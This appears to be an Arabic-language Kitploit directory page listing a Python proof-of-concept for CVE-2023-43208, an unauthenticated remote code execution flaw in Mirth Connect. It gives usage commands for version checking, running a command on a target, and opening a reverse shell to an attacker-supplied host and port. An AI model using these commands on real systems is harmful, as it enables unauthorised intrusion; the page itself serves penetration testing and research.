Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-43208-PoC — نص برمجي بلغة بايثون لإثبات المفهوم يستعرض ثغرة CVE‑2023‑43208 في Mirth Connect، مما يتيح فحص الإصدارات وتنفيذ الأوامر على النسخ المعرضة للخطر. | Kitploit
أدوات/GitHubGitHub/criz117/cve-2023-43208-poc
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubcriz117/cve-2023-43208-poc

CVE-2023-43208-PoC

نص برمجي بلغة بايثون لإثبات المفهوم يستعرض ثغرة CVE‑2023‑43208 في Mirth Connect، مما يتيح فحص الإصدارات وتنفيذ الأوامر على النسخ المعرضة للخطر.

عرض المستودع
1منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-43208 - Mirth Connect RCE غير مصادق عليه

المتطلبات

  • Python 3.11 أو أحدث (تم الاختبار على 3.11 و3.12 و3.13)

الإعداد

root@kitploit:~
# Create a clean virtual environment
python3 -m venv .venv
source .venv/bin/activate

# Install pinned dependencies
pip install -r requirements.txt

الاستخدام

root@kitploit:~
# Check version only
python3 CVE-2023-43208.py -u https://TARGET/ --check

# Execute a single command
python3 CVE-2023-43208.py -u https://TARGET/ -c "whoami"

# Reverse shell (start nc listener first)
python3 CVE-2023-43208.py -u https://TARGET/ -l LHOST -p LPORT

ملاحظات

  • استجابة 500 من الخادم طبيعية ومتوقعة — لا يزال الأمر يُنفَّذ
  • يؤثر على Mirth Connect < 4.4.1

إخلاء مسؤولية

يُقدَّم إثبات المفهوم (Proof of Concept) هذا لأغراض البحث والتعليم فقط. لا تستخدمه ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذا الكود.

تنزيل الأداة